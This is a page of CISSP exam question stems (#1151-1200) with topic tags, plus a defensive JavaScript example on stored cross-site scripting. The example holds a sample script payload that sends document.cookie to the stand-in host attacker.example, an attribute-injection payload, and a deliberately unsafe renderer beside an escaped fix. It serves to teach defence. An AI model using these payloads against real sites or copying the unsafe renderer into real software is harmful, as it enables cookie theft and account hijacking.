CISSP Exam Questions
1,535 real CISSP exam questions with expert-verified answers and explanations. Page 24 of 31.
- Question #1151 (Security and Risk Management)
  What is considered a compensating control for not having electrical surge protectors installed?
  Tags: compensating controls, physical security, power redundancy, business continuity
- Question #1152 (Security and Risk Management)
  What is considered the BEST explanation when determining whether to provide remote network access to a third-party security service?
  Tags: third-party access, remote access, business justification, risk management
- Question #1153 (Identity and Access Management (IAM))
  When network management is outsourced to third parties, which of the following is the MOST effective method of protecting critical data assets?
  Tags: third-party risk, outsourcing security, access control, data protection
- Question #1154 (Communication and Network Security)
  What is the FIRST step in reducing the exposure of a network to Internet Control Message Protocol (ICMP) based attacks?
  Tags: network security, ICMP attack, egress filtering, network boundary
- Question #1155 (Security Architecture and Engineering)
  A system developer has a requirement for an application to check for a secure digital signature before the application is accessed on a user's laptop. Which security mechanism addr...
  Tags: Trusted Platform Module (TPM), secure boot, digital signature verification, endpoint security
- Question #1156 (Security Operations)
  The security organization is looking for a solution that could help them determine with a strong level of confidence that attackers have breached their network. Which solution is M...
  Tags: breach detection, honeypot, threat intelligence, security monitoring
- Question #1157 (Security and Risk Management)
  A security architect is reviewing plans for an application with a Recovery Point Objective (RPO) of 15 minutes. The current design has all of the application infrastructure located...
  Tags: RPO, availability, disaster recovery, single point of failure
- Question #1158 (Security Operations)
  Which of the following outsourcing agreement provisions has the HIGHEST priority from a security operations perspective?
  Tags: outsourcing security, incident response, SLA, third-party management
- Question #1159 (Security and Risk Management)
  When designing a Cyber-Physical System (CPS), which of the following should be a security practitioner's first consideration?
  Tags: Cyber-Physical Systems, risk assessment, security design principles
- Question #1160 (Communication and Network Security)
  A security professional was tasked with rebuilding a company's wireless infrastructure. Which of the following are the MOST important factors to consider while making a decision on...
  Tags: wireless security, network design, radio signal interference
- Question #1161 (Security Operations)
  A subscription service which provides power, climate control, raised flooring, and telephone wiring but NOT the computer and peripheral equipment is BEST described as a:
  Tags: cold site, disaster recovery, business continuity
- Question #1162 (Identity and Access Management)
  Which of the following is the PRIMARY goal of logical access controls?
  Tags: logical access control, information asset protection, access management
- Question #1163 (Software Development Security)
  The ability to send malicious code, generally in the form of a client side script, to a different end user is categorized as which type of vulnerability?
  Tags: Cross-Site Scripting (XSS), web vulnerabilities, client-side scripting
- Question #1164 (Security Assessment and Testing)
  The security architect has been mandated to assess the security of various brands of mobile devices. At what phase of the product lifecycle would this be MOST likely to occur?
  Tags: security assessment, mobile device security, system lifecycle
- Question #1165 (Security Operations)
  A hacker can use a lockout capability to start which of the following attacks?
  Tags: denial of service, account lockout, attack vectors
- Question #1166 (Asset Security)
  An Internet media company produces and broadcasts highly popular television shows. The company is suffering a huge revenue loss due to piracy. What technique should be used to trac...
  Tags: digital watermarking, content protection, piracy prevention
- Question #1167 (Security Architecture and Engineering)
  Using the cipher text and resultant clear text message to derive the non-alphabetic cipher key is an example of which method of cryptanalytic attack?
  Tags: cryptanalytic attack, known-plaintext attack, cryptography
- Question #1168 (Communication and Network Security)
  All hosts on the network are sending logs via syslog-ng to the log collector. The log collector is behind its own firewall. The security professional wants to make sure not to put...
  Tags: firewall filtering, static packet filtering, network security
- Question #1169 (Asset Security)
  An organization has been collecting a large amount of redundant and unusable data and filling up the storage area network (SAN). Management has requested the identification of a so...
  Tags: data deduplication, storage optimization, SAN management
- Question #1170 (Security and Risk Management)
  A security practitioner has been asked to model best practices for disaster recovery (DR) and business continuity. The practitioner has decided that a formal committee is needed to...
  Tags: business continuity planning, disaster recovery, policy development
- Question #1171 (Security and Risk Management)
  What is the MOST appropriate hierarchy of documents when implementing a security program?
  Tags: security policy, standards and guidelines, documentation hierarchy
- Question #1172 (Security Operations)
  Which of the following is the MOST common cause of system or security failures?
  Tags: change control, system failures, operational security
- Question #1173 (Identity and Access Management)
  Which access control method is based on users issuing access requests on system resources, features assigned to those resources, the operational or situational context, and a set o...
  Tags: Attribute Based Access Control (ABAC), access control models, context-aware access
- Question #1174 (Communication and Network Security)
  Information security practitioners are in the midst of implementing a new firewall. Which of the following failure methods would BEST prioritize security in the event of failure?
  Tags: fail-closed, firewall security, network resilience
- Question #1175 (Communication and Network Security)
  Which of the following is a PRIMARY security weakness in the design of Domain Name System (DNS)?
  Tags: DNS security, protocol vulnerabilities, source authentication
- Question #1176 (Security Architecture and Engineering)
  Which of the following BEST describes the purpose of the reference monitor when defining access control to enforce the security model?
  Tags: reference monitor, security models, access control enforcement
- Question #1177 (Security and Risk Management)
  A project manager for a large software firm has acquired a government contract that generates large amounts of Controlled Unclassified Information (CUI). The organization's informa...
  Tags: data ownership, Controlled Unclassified Information (CUI), information governance
- Question #1178 (Security and Risk Management)
  Which of the following protects personally identifiable information (PII) used by financial services organizations?
  Tags: Gramm-Leach-Bliley Act (GLBA), PII protection, financial services compliance
- Question #1179 (Security Assessment and Testing)
  Which of the following is a common term for log reviews, synthetic transactions, and code reviews?
  Tags: security control testing, log review, code review, synthetic transactions
- Question #1180 (Software Development Security)
  At what stage of the Software Development Life Cycle (SDLC) does software vulnerability remediation MOST likely cost the least to implement?
  Tags: SDLC, vulnerability remediation, secure design, cost analysis
- Question #1181 (Security Assessment and Testing)
  Which of the following BEST describes when an organization should conduct a black box security audit on a new software product?
  Tags: black box testing, security audit, software product lifecycle
- Question #1182 (Security and Risk Management)
  The Chief Information Officer (CIO) has decided that as part of business modernization efforts the organization will move towards a cloud architecture. All business-critical data w...
  Tags: organizational roles, cloud migration, data protection, CISO
- Question #1183 (Security and Risk Management)
  When reviewing vendor certifications for handling and processing of company data, which of the following is the BEST Service Organization Controls (SOC) certification for the vendo...
  Tags: SOC reports, vendor management, compliance, third-party risk
- Question #1184 (Security Architecture and Engineering)
  Which of the following is a covert channel type?
  Tags: covert channels, information flow, data leakage
- Question #1185 (Security and Risk Management)
  Which change management role is responsible for the overall success of the project and supporting the change throughout the organization?
  Tags: change management, program sponsor, organizational roles
- Question #1186 (Identity and Access Management)
  Which of the following is a unique feature of attribute-based access control (ABAC)?
  Tags: ABAC, access control, attribute-based access
- Question #1187 (Security Assessment and Testing)
  When auditing the Software Development Life Cycle (SDLC), which of the following is one of the high-level audit phases?
  Tags: SDLC audit, audit phases, planning
- Question #1188 (Communication and Network Security)
  Which of the following BEST describes the purpose of Border Gateway Protocol (BGP)?
  Tags: BGP, routing protocol, autonomous systems, network paths
- Question #1189 (Asset Security)
  Which of the following is the PRIMARY purpose of installing a mantrap within a facility?
  Tags: physical security, mantrap, anti-tailgating, access control
- Question #1190 (Security Architecture and Engineering)
  A security professional can BEST mitigate the risk of using a Commercial Off-The-Shelf (COTS) solution by deploying the application with which of the following controls in ?
  Tags: COTS, security hardening, risk mitigation, secure configuration
- Question #1191 (Security Operations)
  Which of the following would an information security professional use to recognize changes to content, particularly unauthorized changes?
  Tags: file integrity monitoring, unauthorized changes, security tools
- Question #1192 (Security and Risk Management)
  An organization with divisions in the United States (US) and the United Kingdom (UK) processes data comprised of personal information belonging to subjects living in the European U...
  Tags: GDPR, data privacy, data residency, compliance
- Question #1193 (Security and Risk Management)
  Which of the following has the responsibility of information technology (IT) governance?
  Tags: IT governance, organizational roles, Board of Directors
- Question #1194 (Security Assessment and Testing)
  Dumpster diving is a technique used in which stage of penetration testing methodology?
  Tags: penetration testing, dumpster diving, reconnaissance, information gathering
- Question #1195 (Security Operations)
  What is the MOST common cause of Remote Desktop Protocol (RDP) compromise?
  Tags: RDP, brute force attack, attack vectors, common vulnerabilities
- Question #1196 (Asset Security)
  An organization is looking to include mobile devices in its asset management system for better tracking. In which system tier of the reference architecture would mobile devices be...
  Tags: asset management, mobile devices, asset classification, system tiering
- Question #1197 (Communication and Network Security)
  Which is MOST important when negotiating an Internet service provider (ISP) service-level agreement (SLA) by an organization that solely provides Voice over Internet Protocol (VoIP...
  Tags: SLA, VoIP, QoS, network performance
- Question #1198 (Identity and Access Management)
  A company developed a web application which is sold as a Software as a Service (SaaS) solution to the customer. The application is hosted by a web server running on a specific oper...
  Tags: least privilege, access control, application logs, SaaS security
- Question #1199 (Security Architecture and Engineering)
  A systems engineer is designing a wide area network (WAN) environment for a new organization. The WAN will connect sites holding information at various levels of sensitivity, from...
  Tags: WAN security, risk alignment, security design principles, interconnected systems
- Question #1200 (Security and Risk Management)
  Which event magnitude is defined as deadly, destructive, and disruptive when a hazard interacts with human vulnerability?
  Tags: disaster definition, risk terminology, business continuity
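Question #1163 describes the vulnerability class the tags name as Cross-Site Scripting: script supplied by one user is delivered, through the application, to a different user's browser. The following is an added example, not part of the question bank, showing the stored form of that flaw in a comment renderer next to the hardened version. The comment data, the `attacker.example` host, and the function names are constructed for illustration.

```javascript
// Added example (not from the question bank): stored XSS in a comment
// renderer, the vulnerable form beside the fixed one. The comments below
// are constructed sample data: one user stores a payload, another reads it.
const STORED_COMMENTS = [
  { author: "alice", body: "Nice write-up, thanks!" },
  // Payload in the text-node position: an element injected into the page.
  { author: "mallory", body: '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' },
  // Payload in the attribute position: closes the quoted attribute and
  // adds an event handler on the same element.
  { author: 'eve" onmouseover="alert(1)', body: "hi" },
];

// Vulnerable: untrusted text is concatenated straight into HTML. The
// <script> element and the attribute break-out are emitted verbatim and
// would execute in every reader's browser, which is exactly the "sent to a
// different end user" property the question describes.
function renderCommentsUnsafe(comments) {
  return comments
    .map(c => `<li class="comment" data-author="${c.author}">${c.body}</li>`)
    .join("\n");
}

// Output encoding for an HTML text node or a double-quoted attribute value.
// Encoding these five characters stops untrusted text from closing the
// current element or attribute and starting markup of its own.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Fixed: every untrusted value is encoded for the context it lands in.
// (This covers text and quoted-attribute contexts only; URL, JavaScript
// and CSS contexts need their own encoders.)
function renderCommentsSafe(comments) {
  return comments
    .map(c => `<li class="comment" data-author="${escapeHtml(c.author)}">${escapeHtml(c.body)}</li>`)
    .join("\n");
}

// Crude check a test can run over rendered output: did a raw script tag or
// an attribute break-out from the sample payloads survive into the HTML?
function containsActiveMarkup(html) {
  return /<script\b/i.test(html) || /" onmouseover=/.test(html);
}

// Stand-alone run: show both renderings side by side.
console.log("UNSAFE:\n" + renderCommentsUnsafe(STORED_COMMENTS));
console.log("SAFE:\n" + renderCommentsSafe(STORED_COMMENTS));
```

Encoding at output time is the control that makes the stored payload harmless regardless of how it got into the database; input validation alone does not, because the same string may be safe in one context and active in another.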